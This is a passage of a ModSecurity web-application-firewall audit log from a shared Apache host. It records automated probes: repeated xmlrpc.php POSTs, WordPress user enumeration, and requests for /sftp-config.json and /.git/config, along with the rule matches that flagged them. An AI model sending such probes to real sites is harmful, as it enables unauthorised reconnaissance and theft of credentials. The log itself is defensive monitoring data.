//xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f0f72d69-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f0f72d69-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7eskD4emz4pcZ5aGTbbAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999282697604 883996 (- - -) Stopwatch2: 1749999282697604 883996; combined=2372, p1=389, p2=1634, p3=40, p4=58, p5=158, sr=108, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f0f72d69-Z-- --a4344e29-A-- [15/Jun/2025:20:25:44.057885 +0530] aE7e74VZSDEfL5zL02JC5AAAAAI 128.199.112.101 41122 127.0.0.1 7081 --a4344e29-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a4344e29-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a4344e29-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7e74VZSDEfL5zL02JC5AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999343061447 996502 (- - -) Stopwatch2: 1749999343061447 996502; combined=2121, p1=357, p2=1270, p3=42, p4=78, p5=237, sr=101, sw=137, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4344e29-Z-- --7c165641-A-- [15/Jun/2025:20:26:44.121419 +0530] aE7fK_yBV0BIpWmUvo8RFQAAAAc 128.199.112.101 56292 127.0.0.1 7081 --7c165641-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7c165641-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7c165641-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7fK_yBV0BIpWmUvo8RFQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999403187488 933987 (- - -) Stopwatch2: 1749999403187488 933987; combined=2129, p1=355, p2=1408, p3=39, p4=63, p5=164, sr=86, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7c165641-Z-- --e642496c-A-- [15/Jun/2025:20:27:44.141770 +0530] aE7fZwG_OhOIIVz6TXRzsgAAAAA 128.199.112.101 58296 127.0.0.1 7081 --e642496c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --e642496c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e642496c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7fZwG_OhOIIVz6TXRzsgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999463291604 850233 (- - -) Stopwatch2: 1749999463291604 850233; combined=2199, p1=368, p2=1458, p3=43, p4=62, p5=167, sr=99, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e642496c-Z-- --20bcec7e-A-- [15/Jun/2025:20:28:25.178546 +0530] aE7fkTC7Dm45DAhop9gObAAAAAY 208.88.73.86 41036 127.0.0.1 7081 --20bcec7e-B-- GET /sftp-config.json HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --20bcec7e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --20bcec7e-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE7fkTC7Dm45DAhop9gObAAAAAY"] Stopwatch: 1749999505175351 3255 (- - -) Stopwatch2: 1749999505175351 3255; combined=1867, p1=381, p2=1425, p3=0, p4=0, p5=61, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --20bcec7e-Z-- --7d56514c-A-- [15/Jun/2025:20:28:44.926745 +0530] aE7fpPRzj1BwdxQoarvM4gAAAAo 128.199.112.101 45620 127.0.0.1 7081 --7d56514c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7d56514c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7d56514c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (52+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (52+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7fpPRzj1BwdxQoarvM4gAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999524042152 884650 (- - -) Stopwatch2: 1749999524042152 884650; combined=2489, p1=376, p2=1689, p3=47, p4=69, p5=189, sr=99, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d56514c-Z-- --f6ce177e-A-- [15/Jun/2025:20:29:45.960100 +0530] aE7f4RLQPChAjmM6-0iqwwAAAAQ 128.199.112.101 44436 127.0.0.1 7081 --f6ce177e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 514 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f6ce177e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f6ce177e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (52+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (52+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7f4RLQPChAjmM6-0iqwwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999585031687 928468 (- - -) Stopwatch2: 1749999585031687 928468; combined=2417, p1=378, p2=1609, p3=48, p4=73, p5=189, sr=101, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6ce177e-Z-- --d377df66-A-- [15/Jun/2025:20:30:46.815613 +0530] aE7gHZK-05zbifgH_rT5tAAAAAU 128.199.112.101 54440 127.0.0.1 7081 --d377df66-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d377df66-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d377df66-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7gHZK-05zbifgH_rT5tAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999645874307 941373 (- - -) Stopwatch2: 1749999645874307 941373; combined=2623, p1=464, p2=1706, p3=45, p4=70, p5=204, sr=138, sw=134, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d377df66-Z-- --518be55f-A-- [15/Jun/2025:20:31:46.969772 +0530] aE7gWlu1-lKBbvo2E9pWJwAAAAw 128.199.112.101 43188 127.0.0.1 7081 --518be55f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --518be55f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --518be55f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7gWlu1-lKBbvo2E9pWJwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999706050694 919135 (- - -) Stopwatch2: 1749999706050694 919135; combined=2030, p1=324, p2=1329, p3=42, p4=62, p5=171, sr=85, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --518be55f-Z-- --3953bf5d-A-- [15/Jun/2025:20:32:47.365476 +0530] aE7gltxscloMz_lG7ehqCQAAAAM 128.199.112.101 50308 127.0.0.1 7081 --3953bf5d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --3953bf5d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3953bf5d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7gltxscloMz_lG7ehqCQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999766429509 936023 (- - -) Stopwatch2: 1749999766429509 936023; combined=2310, p1=369, p2=1585, p3=41, p4=51, p5=165, sr=100, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3953bf5d-Z-- --dda4875d-A-- [15/Jun/2025:20:33:47.857687 +0530] aE7g0vRzj1BwdxQoarvNdAAAAAo 128.199.112.101 45190 127.0.0.1 7081 --dda4875d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --dda4875d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --dda4875d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7g0vRzj1BwdxQoarvNdAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999826873993 983761 (- - -) Stopwatch2: 1749999826873993 983761; combined=2461, p1=384, p2=1643, p3=46, p4=68, p5=196, sr=105, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dda4875d-Z-- --14410e27-A-- [15/Jun/2025:20:34:04.742545 +0530] aE7g4wG_OhOIIVz6TXR0bwAAAAA 38.57.3.41 53228 127.0.0.1 7081 --14410e27-B-- GET ///wp-json/wp/v2/users/ HTTP/1.0 Host: www.rooferscombine.com X-Real-IP: 38.57.3.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 Referer: http://rooferscombine.com///wp-json/wp/v2/users/ Accept-Encoding: gzip --14410e27-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.rooferscombine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --14410e27-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rooferscombine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7g4wG_OhOIIVz6TXR0bwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rooferscombine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999843765204 977453 (- - -) Stopwatch2: 1749999843765204 977453; combined=1961, p1=329, p2=1519, p3=0, p4=0, p5=112, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --14410e27-Z-- --64c7a144-A-- [15/Jun/2025:20:34:06.332075 +0530] aE7g5kD4emz4pcZ5aGTcawAAAAE 208.88.73.86 53302 127.0.0.1 7081 --64c7a144-B-- GET /.git/config HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --64c7a144-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --64c7a144-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/.git/config"] [unique_id "aE7g5kD4emz4pcZ5aGTcawAAAAE"] Stopwatch: 1749999846328999 3136 (- - -) Stopwatch2: 1749999846328999 3136; combined=1876, p1=368, p2=1450, p3=0, p4=0, p5=58, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --64c7a144-Z-- --53037072-A-- [15/Jun/2025:20:34:47.865011 +0530] aE7hDhLQPChAjmM6-0irTwAAAAQ 128.199.112.101 34372 127.0.0.1 7081 --53037072-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 511 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --53037072-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --53037072-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7hDhLQPChAjmM6-0irTwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999886991308 873757 (- - -) Stopwatch2: 1749999886991308 873757; combined=2066, p1=379, p2=1334, p3=41, p4=55, p5=163, sr=106, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53037072-Z-- --7fe4f06a-A-- [15/Jun/2025:20:35:07.836409 +0530] aE7hIzC7Dm45DAhop9gPNgAAAAY 52.73.6.26 54314 127.0.0.1 7081 --7fe4f06a-B-- GET 